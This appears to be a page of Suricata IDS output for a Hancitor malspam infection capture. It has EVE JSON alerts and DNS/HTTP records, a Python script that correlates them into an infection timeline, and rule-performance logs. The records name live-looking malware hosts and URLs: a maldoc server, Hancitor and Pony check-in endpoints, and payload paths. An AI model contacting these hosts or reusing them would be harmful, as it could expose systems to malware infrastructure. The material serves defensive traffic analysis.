{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":512358085831819,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"23.23.114.123"}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":512358085831819,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"50.16.248.221"}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":512358085831819,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"50.19.229.252"}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":512358085831819,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"23.21.121.219"}}
{"timestamp":"2018-09-04T15:50:12.405238+0000","flow_id":512358085831819,"pcap_cnt":241,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":59335,"proto":"UDP","dns":{"type":"answer","id":2042,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":5,"rdata":"54.243.123.39"}}
{"timestamp":"2018-09-04T15:50:12.796998+0000","flow_id":695830498792427,"pcap_cnt":248,"event_type":"alert","src_ip":"10.9.4.102","src_port":49173,"dest_ip":"54.243.179.137","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2021997,"rev":3,"signature":"ET POLICY External IP Lookup api.ipify.org","category":"Potential Corporate Privacy Violation","severity":1},"app_proto":"http"}
{"timestamp":"2018-09-04T15:50:12.796998+0000","flow_id":695830498792427,"pcap_cnt":248,"event_type":"http","src_ip":"10.9.4.102","src_port":49173,"dest_ip":"54.243.179.137","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"api.ipify.org","url":"\/","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/plain"}}
{"timestamp":"2018-09-04T15:50:12.804076+0000","flow_id":729185214809324,"pcap_cnt":249,"event_type":"dns","src_ip":"10.9.4.102","src_port":58852,"dest_ip":"10.9.4.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":25574,"rrname":"thenlorefuse.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-09-04T15:50:13.886886+0000","flow_id":729185214809324,"pcap_cnt":251,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":58852,"proto":"UDP","dns":{"type":"answer","id":25574,"rcode":"NOERROR","rrname":"thenlorefuse.com","rrtype":"A","ttl":5,"rdata":"185.66.9.184"}}
{"timestamp":"2018-09-04T15:50:14.397704+0000","flow_id":1743617835502485,"pcap_cnt":259,"event_type":"alert","src_ip":"10.9.4.102","src_port":49174,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2819978,"rev":5,"signature":"ETPRO TROJAN Tordal\/Hancitor\/Chanitor Checkin","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-09-04T15:50:14.397704+0000","flow_id":1743617835502485,"pcap_cnt":259,"event_type":"http","src_ip":"10.9.4.102","src_port":49174,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"thenlorefuse.com","url":"\/4\/forum.php","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2018-09-04T15:50:14.397704+0000","flow_id":1743617835502485,"pcap_cnt":259,"event_type":"fileinfo","src_ip":"10.9.4.102","src_port":49174,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","http":{"hostname":"thenlorefuse.com","url":"\/4\/forum.php","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":566},"app_proto":"http","fileinfo":{"filename":"\/4\/forum.php","gaps":false,"state":"CLOSED","stored":false,"size":126,"tx_id":0}}
{"timestamp":"2018-09-04T15:50:14.398978+0000","flow_id":1031164365510274,"pcap_cnt":260,"event_type":"dns","src_ip":"10.9.4.102","src_port":63476,"dest_ip":"10.9.4.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":7227,"rrname":"birgroupholdings.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-09-04T15:50:14.489068+0000","flow_id":1031164365510274,"pcap_cnt":261,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":63476,"proto":"UDP","dns":{"type":"answer","id":7227,"rcode":"NOERROR","rrname":"birgroupholdings.com","rrtype":"A","ttl":5,"rdata":"184.95.44.218"}}
{"timestamp":"2018-09-04T15:50:14.854139+0000","flow_id":8485407717784,"pcap_cnt":308,"event_type":"alert","src_ip":"184.95.44.218","src_port":80,"dest_ip":"10.9.4.102","dest_port":49175,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2824549,"rev":2,"signature":"ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1)","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-09-04T15:50:14.854869+0000","flow_id":8485407717784,"pcap_cnt":318,"event_type":"http","src_ip":"10.9.4.102","src_port":49175,"dest_ip":"184.95.44.218","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"birgroupholdings.com","url":"\/wp-content\/plugins\/wp-file-manager\/lib\/1","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko"}}
{"timestamp":"2018-09-04T15:50:14.855358+0000","flow_id":8485407717784,"pcap_cnt":321,"event_type":"fileinfo","src_ip":"184.95.44.218","src_port":80,"dest_ip":"10.9.4.102","dest_port":49175,"proto":"TCP","http":{"hostname":"birgroupholdings.com","url":"\/wp-content\/plugins\/wp-file-manager\/lib\/1","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":46326},"app_proto":"http","fileinfo":{"filename":"\/wp-content\/plugins\/wp-file-manager\/lib\/1","gaps":false,"state":"CLOSED","stored":false,"size":46326,"tx_id":0}}
{"timestamp":"2018-09-04T15:50:20.873439+0000","flow_id":332270107644895,"pcap_cnt":322,"event_type":"dns","src_ip":"10.9.4.102","src_port":53643,"dest_ip":"10.9.4.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":622,"rrname":"thenlorefuse.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-09-04T15:50:21.464489+0000","flow_id":332270107644895,"pcap_cnt":323,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":53643,"proto":"UDP","dns":{"type":"answer","id":622,"rcode":"NOERROR","rrname":"thenlorefuse.com","rrtype":"A","ttl":5,"rdata":"185.66.9.184"}}
{"timestamp":"2018-09-04T15:50:21.605555+0000","flow_id":1537223182588189,"pcap_cnt":329,"event_type":"alert","src_ip":"10.9.4.102","src_port":49176,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2014411,"rev":11,"signature":"ET TROJAN Fareit\/Pony Downloader Checkin 2","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-09-04T15:50:22.152587+0000","flow_id":1537223182588189,"pcap_cnt":332,"event_type":"fileinfo","src_ip":"10.9.4.102","src_port":49176,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","http":{"hostname":"thenlorefuse.com","url":"\/mlu\/forum.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html","http_method":"POST","protocol":"HTTP\/1.0","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/mlu\/forum.php","gaps":false,"state":"CLOSED","stored":false,"size":207,"tx_id":0}}
{"timestamp":"2018-09-04T15:50:22.153985+0000","flow_id":1537223182588189,"pcap_cnt":334,"event_type":"http","src_ip":"10.9.4.102","src_port":49176,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"thenlorefuse.com","url":"\/mlu\/forum.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html"}}
{"timestamp":"2018-09-04T15:50:22.153985+0000","flow_id":1537223182588189,"pcap_cnt":334,"event_type":"fileinfo","src_ip":"185.66.9.184","src_port":80,"dest_ip":"10.9.4.102","dest_port":49176,"proto":"TCP","http":{"hostname":"thenlorefuse.com","url":"\/mlu\/forum.php","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html","http_method":"POST","protocol":"HTTP\/1.0","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/mlu\/forum.php","gaps":false,"state":"CLOSED","stored":false,"size":20,"tx_id":0}}
{"timestamp":"2018-09-04T15:50:22.737948+0000","flow_id":2217069260973895,"pcap_cnt":380,"event_type":"alert","src_ip":"184.95.44.218","src_port":80,"dest_ip":"10.9.4.102","dest_port":49177,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2824549,"rev":2,"signature":"ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1)","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-09-04T15:50:22.738803+0000","flow_id":2217069260973895,"pcap_cnt":390,"event_type":"http","src_ip":"10.9.4.102","src_port":49177,"dest_ip":"184.95.44.218","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"birgroupholdings.com","url":"\/wp-content\/plugins\/wp-file-manager\/lib\/2","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko"}}
{"timestamp":"2018-09-04T15:50:22.739261+0000","flow_id":2217069260973895,"pcap_cnt":393,"event_type":"fileinfo","src_ip":"184.95.44.218","src_port":80,"dest_ip":"10.9.4.102","dest_port":49177,"proto":"TCP","http":{"hostname":"birgroupholdings.com","url":"\/wp-content\/plugins\/wp-file-manager\/lib\/2","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":47399},"app_proto":"http","fileinfo":{"filename":"\/wp-content\/plugins\/wp-file-manager\/lib\/2","gaps":false,"state":"CLOSED","stored":false,"size":47399,"tx_id":0}}
{"timestamp":"2018-09-04T15:50:22.992232+0000","flow_id":389818374617585,"pcap_cnt":415,"event_type":"alert","src_ip":"10.9.4.102","src_port":49179,"dest_ip":"185.66.9.184","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2014411,"rev":11,"signature":"ET TROJAN Fareit\/Pony Downloader Checkin 2","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-09-04T15:50:23.145020+0000","flow_id":475507267109303,"pcap_cnt":443,"event_type":"alert","src_ip":"184.95.44.218","src_port":80,"dest_ip":"10.9.4.102","dest_port":49178,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2824549,"rev":2,"signature":"ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1)","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-09-04T15:50:23.443168+0000","flow_id":475507267109303,"pcap_cnt":597,"event_type":"http","src_ip":"10.9.4.102","src_port":49178,"dest_ip":"184.95.44.218","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"birgroupholdings.com","url":"\/wp-content\/plugins\/wp-file-manager\/lib\/3","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko"}}
{"timestamp":"2018-09-04T15:50:23.443668+0000","flow_id":475507267109303,"pcap_cnt":600,"event_type":"fileinfo","src_ip":"184.95.44.218","src_port":80,"dest_ip":"10.9.4.102","dest_port":49178,"proto":"TCP","http":{"hostname":"birgroupholding

This file has been truncated.
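The EVE records above are the raw material for reconstructing the infection chain: the DNS answers tie names to the IPs the alerts fire on, and the alert, http and fileinfo events for one transfer share a flow_id. The script below is an added example (not part of this page's output and not Suricata tooling) that joins them that way. Its input is a constructed subset of the eve.json lines shown above, trimmed to the fields it reads; everything else is standard library.

```python
"""Correlate Suricata EVE JSON into an infection-chain timeline.

Added example, not part of the original page. Sample records are copied from
the eve.json excerpt above and trimmed to the fields this script reads.
"""
import json
from collections import defaultdict

# Constructed input: one JSON object per line, as Suricata writes eve.json.
SAMPLE_EVE = r'''
{"timestamp":"2018-09-04T15:47:38.531268+0000","flow_id":531694018501444,"event_type":"dns","src_ip":"10.9.4.102","src_port":56774,"dest_ip":"10.9.4.1","dest_port":53,"dns":{"type":"query","rrname":"resolutesearch.com","rrtype":"A"}}
{"timestamp":"2018-09-04T15:47:39.025962+0000","flow_id":531694018501444,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":56774,"dns":{"type":"answer","rcode":"NOERROR","rrname":"resolutesearch.com","rrtype":"A","rdata":"95.213.235.149"}}
{"timestamp":"2018-09-04T15:47:45.738863+0000","flow_id":1062466077352284,"event_type":"alert","src_ip":"95.213.235.149","src_port":80,"dest_ip":"10.9.4.102","dest_port":49165,"alert":{"signature_id":2810419,"signature":"ETPRO CURRENT_EVENTS Inbound cmd.exe Base64 Encoded (ASCII) 1","severity":1}}
{"timestamp":"2018-09-04T15:47:45.825885+0000","flow_id":1062466077352284,"event_type":"alert","src_ip":"95.213.235.149","src_port":80,"dest_ip":"10.9.4.102","dest_port":49165,"alert":{"signature_id":2019837,"signature":"ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide)","severity":2}}
{"timestamp":"2018-09-04T15:47:45.966335+0000","flow_id":1062466077352284,"event_type":"http","src_ip":"10.9.4.102","src_port":49165,"dest_ip":"95.213.235.149","dest_port":80,"http":{"hostname":"resolutesearch.com","url":"\/","http_content_type":"application\/msword"}}
{"timestamp":"2018-09-04T15:48:02.158841+0000","flow_id":1062466077352284,"event_type":"fileinfo","src_ip":"95.213.235.149","src_port":80,"dest_ip":"10.9.4.102","dest_port":49165,"http":{"hostname":"resolutesearch.com","url":"\/","http_method":"GET","status":200},"fileinfo":{"filename":"invoice_149027.doc","size":212992}}
{"timestamp":"2018-09-04T15:50:12.804076+0000","flow_id":729185214809324,"event_type":"dns","src_ip":"10.9.4.102","src_port":58852,"dest_ip":"10.9.4.1","dest_port":53,"dns":{"type":"query","rrname":"thenlorefuse.com","rrtype":"A"}}
{"timestamp":"2018-09-04T15:50:13.886886+0000","flow_id":729185214809324,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":58852,"dns":{"type":"answer","rcode":"NOERROR","rrname":"thenlorefuse.com","rrtype":"A","rdata":"185.66.9.184"}}
{"timestamp":"2018-09-04T15:50:14.397704+0000","flow_id":1743617835502485,"event_type":"alert","src_ip":"10.9.4.102","src_port":49174,"dest_ip":"185.66.9.184","dest_port":80,"alert":{"signature_id":2819978,"signature":"ETPRO TROJAN Tordal\/Hancitor\/Chanitor Checkin","severity":1}}
{"timestamp":"2018-09-04T15:50:14.397704+0000","flow_id":1743617835502485,"event_type":"http","src_ip":"10.9.4.102","src_port":49174,"dest_ip":"185.66.9.184","dest_port":80,"http":{"hostname":"thenlorefuse.com","url":"\/4\/forum.php","http_content_type":"text\/html"}}
{"timestamp":"2018-09-04T15:50:14.489068+0000","flow_id":1031164365510274,"event_type":"dns","src_ip":"10.9.4.1","src_port":53,"dest_ip":"10.9.4.102","dest_port":63476,"dns":{"type":"answer","rcode":"NOERROR","rrname":"birgroupholdings.com","rrtype":"A","rdata":"184.95.44.218"}}
{"timestamp":"2018-09-04T15:50:14.854139+0000","flow_id":8485407717784,"event_type":"alert","src_ip":"184.95.44.218","src_port":80,"dest_ip":"10.9.4.102","dest_port":49175,"alert":{"signature_id":2824549,"signature":"ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1)","severity":1}}
{"timestamp":"2018-09-04T15:50:14.855358+0000","flow_id":8485407717784,"event_type":"fileinfo","src_ip":"184.95.44.218","src_port":80,"dest_ip":"10.9.4.102","dest_port":49175,"http":{"hostname":"birgroupholdings.com","url":"\/wp-content\/plugins\/wp-file-manager\/lib\/1","http_method":"GET","status":200},"fileinfo":{"filename":"\/wp-content\/plugins\/wp-file-manager\/lib\/1","size":46326}}
'''


def load_events(text):
    """Parse newline-delimited EVE JSON, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def passive_dns(events):
    """Build ip -> {names} from DNS A answers, so a flow to a bare IP can be
    tied back to the name the infected host resolved just before it."""
    ip_to_names = defaultdict(set)
    for ev in events:
        dns = ev.get("dns", {})
        if ev["event_type"] == "dns" and dns.get("type") == "answer" and dns.get("rrtype") == "A":
            ip_to_names[dns["rdata"]].add(dns["rrname"])
    return ip_to_names


def server_of(ev):
    """Heuristic: the lower-numbered port is the service side (80 here), the
    high port is the client's ephemeral port. Needed because alert records are
    logged in the direction of the packet that matched, so src/dest flip
    between server-side alerts and the client's HTTP request."""
    return ev["src_ip"] if ev["src_port"] < ev["dest_port"] else ev["dest_ip"]


def correlate(events):
    """Join alert, http and fileinfo records on flow_id; return one stage per
    flow, ordered by the first timestamp seen on that flow."""
    pdns = passive_dns(events)
    flows = {}
    for ev in events:
        if ev["event_type"] not in ("alert", "http", "fileinfo"):
            continue
        stage = flows.setdefault(ev["flow_id"], {
            "first_seen": ev["timestamp"], "flow_id": ev["flow_id"],
            "server": server_of(ev), "hostname": None, "url": None,
            "signatures": [], "files": [],
        })
        stage["first_seen"] = min(stage["first_seen"], ev["timestamp"])
        http = ev.get("http")  # present on http events and on HTTP fileinfo events
        if http:
            stage["hostname"] = http.get("hostname", stage["hostname"])
            stage["url"] = http.get("url", stage["url"])
        if ev["event_type"] == "alert":
            stage["signatures"].append(ev["alert"]["signature"])
        elif ev["event_type"] == "fileinfo":
            stage["files"].append((ev["fileinfo"]["filename"], ev["fileinfo"]["size"]))
    for stage in flows.values():
        if stage["hostname"] is None:  # no Host header seen: fall back to passive DNS
            names = pdns.get(stage["server"])
            stage["hostname"] = sorted(names)[0] if names else None
    return sorted(flows.values(), key=lambda s: s["first_seen"])


def render(chain):
    """One line per flow, with the alerts and files Suricata attached to it."""
    lines = []
    for s in chain:
        lines.append(f"{s['first_seen']}  {s['hostname'] or '?'} ({s['server']})  {s['url'] or ''}")
        lines.extend(f"    alert: {sig}" for sig in s["signatures"])
        lines.extend(f"    file : {name} ({size} bytes)" for name, size in s["files"])
    return "\n".join(lines)


if __name__ == "__main__":
    print(render(correlate(load_events(SAMPLE_EVE))))
```

Run against the full eve.json and the output is the chain the alerts above spell out: the maldoc from resolutesearch.com, the Hancitor check-in to thenlorefuse.com/4/forum.php, the encrypted payloads from birgroupholdings.com/wp-content/plugins/wp-file-manager/lib/1, /2 and /3, and the Fareit/Pony check-in to /mlu/forum.php on the same server. Two caveats: stored:false on every fileinfo record here means no file was extracted to disk, so hashes have to come from the pcap itself, and fileinfo size is the body Suricata reassembled, which can differ from the HTTP length header when a transfer is cut short.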


keyword_perf.log - (15754 bytes)
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 1/28/2019 -- 12:19:23
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             30593594        7886            7886            4137909         3879.00         3879.00         0.00           
  content          181482275       37713           16294           6086040         4812.00         4225.00         5258.00        
  pcre             20871536        5194            3201            392712          4018.00         3726.00         4487.00        
  byte_test        1862559         572             301             26735           3256.00         3542.00         2938.00        
  byte_jump        532649          141             6               35766           3777.00         5072.00         3720.00        
  isdataat         48944           12              0               17341           4078.00         0.00            4078.00        
  flowbits         2159724         745             55              27418           2898.00         3370.00         2861.00        
  urilen           5232614         1620            222             24494           3230.00         3230.00         3229.00        
  byte_extract     54173           17              17              4940            3186.00         3186.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             30593594        7886            7886            4137909         3879.00         3879.00         0.00           
  flowbits         2097752         733             43              27418           2861.00         2869.00         2861.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          97931523        24299           8893            99825           4030.00         3890.00         4111.00        
  pcre             12346067        3479            2433            62655           3548.00         3371.00         3961.00        
  byte_test        1862559         572             301             26735           3256.00         3542.00         2938.00        
  byte_jump        532649          141             6               35766           3777.00         5072.00         3720.00        
  isdataat         48944           12              0               17341           4078.00         0.00            4078.00        
  byte_extract     54173           17              17              4940            3186.00         3186.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         61972           12              12              7341            5164.00         5164.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          7995357         1964            1434            383684          4070.00         3921.00         4474.00        
  pcre             4290855         958             427             36917           4478.00         4497.00         4464.00        
  urilen           5232614         1620            222             24494           3230.00         3230.00         3229.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_client_body
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3995556         1068            295             33022           3741.00         3501.00         3832.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          219357          66              0               7467            3323.00         0.00            3323.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          34325402        631             93              6086040         54398.00        49363.00        55268.00       
  pcre             148473          32              0               17021           4639.00         0.00            4639.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          21791082        5212            3732            387316          4180.00         4320.00         3828.00        
  pcre             3251886         530             205             392712          6135.00         5814.00         6338.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          2030135         535             282             41330           3794.00         3943.00         3628.00        
  pcre             18583           4               4               5275            4645.00         4645.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_accept
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  pcre             221380          59              0               5139            3752.00         0.00            3752.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_type
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          791535          183             181             65236           4325.00         4328.00         4041.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_protocol
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          13889           4               4               3768            3472.00         3472.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3945963         1106            982             37815           3567.00         3543.00         3756.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1712087         437             230             22942           3917.00         4202.00         3601.00        
  pcre             594292          132             132             18785           4502.00         4502.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          4474            1               1               4474            4474.00         4474.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          454052          127             5               17795           3575.00         3247.00         3588.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: tls_cert_subject
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          518375          164             162             4197            3160.00         3162.00         3010.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: tls_cert_serial
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          5753488         1916            0               31607           3002.00         0.00            3002.00        


suricata-4.0.0-etpro-all-perf.txt-2019-01-28-T-12-19-23-01282019.1218-2018-09-04-Hancitor-malspam-infection-traffic.pcap.txt - (83798 bytes)
  --------------------------------------------------------------------------
  Date: 1/28/2019 -- 12:19:23. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2820157      1        2        12321395     2.20   37       0        6107673     333010.68   0.00        333010.68  
  2        2820158      1        2        12119575     2.16   37       0        5981715     327556.08   0.00        327556.08  
  3        2024549      1        2        6180404      1.10   7        0        5813665     882914.86   0.00        882914.86  
  4        2022901      1        2        6841382      1.22   61       0        4188373     112153.80   0.00        112153.80  
  5        2816910      1        2        4187070      0.75   66       0        444606      63440.45    0.00        63440.45   
